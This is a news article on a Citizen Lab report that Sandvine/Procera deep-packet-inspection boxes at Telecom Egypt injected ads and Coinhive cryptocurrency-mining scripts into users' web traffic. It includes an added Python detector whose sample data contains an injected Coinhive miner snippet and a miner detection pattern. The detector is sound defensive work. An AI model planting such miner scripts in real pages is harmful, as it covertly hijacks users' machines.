Report Shows Egypt is Covertly Mining Cryptocurrency on Citizens’ Computers
The Egyptian government has been called out in a new report suggesting that it is not only spying on and censoring its citizens’ internet use but also using their computers to mine cryptocurrency.
Government Mining Cryptocurrency Covertly
The Citizen Lab, an interdisciplinary laboratory at the University of Toronto, published a report on Friday strongly suggesting that Egypt has been mining cryptocurrency secretly on its citizens’ computers. The report explained that Sandvine/Procera Networks Deep Packet Inspection (DPI) devices were used “to covertly raise money through affiliate ads and cryptocurrency mining in Egypt.”
Sandvine Corporation was acquired in September of last year by private equity firm Francisco Partners, which bought Procera Networks in 2015. Sandvine and Procera Networks then merged and have been producing website-filtering software called PacketLogic, which the report says “may have been used by government-linked entities in both Turkey and Egypt to inject spyware.”
In addition, the Lab found that the software was injecting at least one cryptocurrency mining script, Coinhive, a readily available browser miner for the privacy-centric cryptocurrency Monero (XMR).
Through a process that began with scanning all of the IP addresses in certain countries, the researchers found DPI devices called middleboxes on Turk Telekom’s network that intercept traffic between users and various unencrypted websites.
These devices were “used to redirect hundreds of users in Turkey and Syria to nation-state spyware when those users attempted to download certain legitimate Windows applications,” the researchers elaborated. In Egypt, the team found more than just spyware, stating:
We found similar middleboxes at a Telecom Egypt demarcation point. The middleboxes were being used to redirect users across dozens of ISPs to affiliate ads and browser cryptocurrency mining scripts.
Installing Mining Scripts
Telecom Egypt is the country’s primary telephone company with a fixed line subscriber base of over 6 million. It is 80% owned by the Egyptian Ministry of Communications and Information Technology.
The researchers named the Egyptian revenue-generation scheme “AdHose”. The report explained that AdHose has two modes: spray mode and trickle mode. The former “redirects Egyptian Internet users en masse to ads or cryptocurrency mining scripts whenever they make a request to any website” and the latter “targets some JavaScript resources and defunct websites for ad injection.” The report revealed that the scheme has been run by the same entity “since at least October 2016.”
While scanning a group of 5,702 IP addresses in January that belonged to 4 of the 17 ASNs present in Egypt, the team concluded:
Of these 5,702 IPs, 5,443 in four ASNs returned the advertising redirect, for an injection rate of ~95%.
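As an added illustration (not code from the report or from Citizen Lab), the following shows how responses from a scan like the one described above could be classified as injected or clean and summed into an injection rate. The sample responses, the `.test` hostnames and the detection heuristics (an off-domain redirect, or a body referencing the Coinhive miner) are constructed assumptions for this example.

```python
import re
from urllib.parse import urlparse

# Constructed sample of HTTP responses as a scanner might collect them, one per
# probed host: (probed_host, status_code, headers, body). Made up for this
# example; not data from the Citizen Lab scan.
SAMPLE_RESPONSES = [
    ("example-news.test", 307, {"Location": "http://ad-affiliate.test/click?id=1"}, ""),
    ("example-shop.test", 200, {}, "<html><body>Welcome</body></html>"),
    ("example-blog.test", 200, {},
     '<script src="http://cdn.miner.test/coinhive.min.js"></script>'
     "<script>new CoinHive.Anonymous('SITEKEY').start();</script>"),
    ("example-forum.test", 302, {"Location": "http://example-forum.test/index.php"}, ""),
    ("example-wiki.test", 307, {"Location": "http://ad-affiliate.test/click?id=2"}, ""),
]

# Heuristics assumed for this example: a redirect is suspicious when it leaves
# the probed host entirely; a body is suspicious when it references Coinhive.
MINER_PATTERNS = re.compile(r"coinhive|CoinHive\.Anonymous", re.IGNORECASE)


def off_domain_redirect(probed_host, status, headers):
    """True if the response redirects to a host other than the one probed."""
    if status not in (301, 302, 303, 307, 308):
        return False
    target = urlparse(headers.get("Location", "")).hostname or ""
    return target != "" and target != probed_host


def classify(response):
    """Label one response as 'redirect', 'miner' or 'clean'."""
    host, status, headers, body = response
    if off_domain_redirect(host, status, headers):
        return "redirect"
    if MINER_PATTERNS.search(body):
        return "miner"
    return "clean"


def injection_rate(responses):
    """Fraction of probed hosts whose response shows injection (redirect or miner)."""
    hits = sum(1 for r in responses if classify(r) != "clean")
    return hits / len(responses) if responses else 0.0


if __name__ == "__main__":
    for r in SAMPLE_RESPONSES:
        print(f"{r[0]:20} {classify(r)}")
    print(f"injection rate: {injection_rate(SAMPLE_RESPONSES):.0%}")
```

On the constructed sample, three of five hosts show injection, so the function reports a 60% rate; the report's ~95% figure is the same ratio computed over its 5,702 probed IPs.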
The Citizen Lab sent letters to Sandvine and Francisco Partners in February summarizing its findings. In its reply, Sandvine claimed that the report is “false, misleading, and wrong.” However, the lab says, “We emphasized that we were confident in our research findings, which two independent peer reviews confirmed.”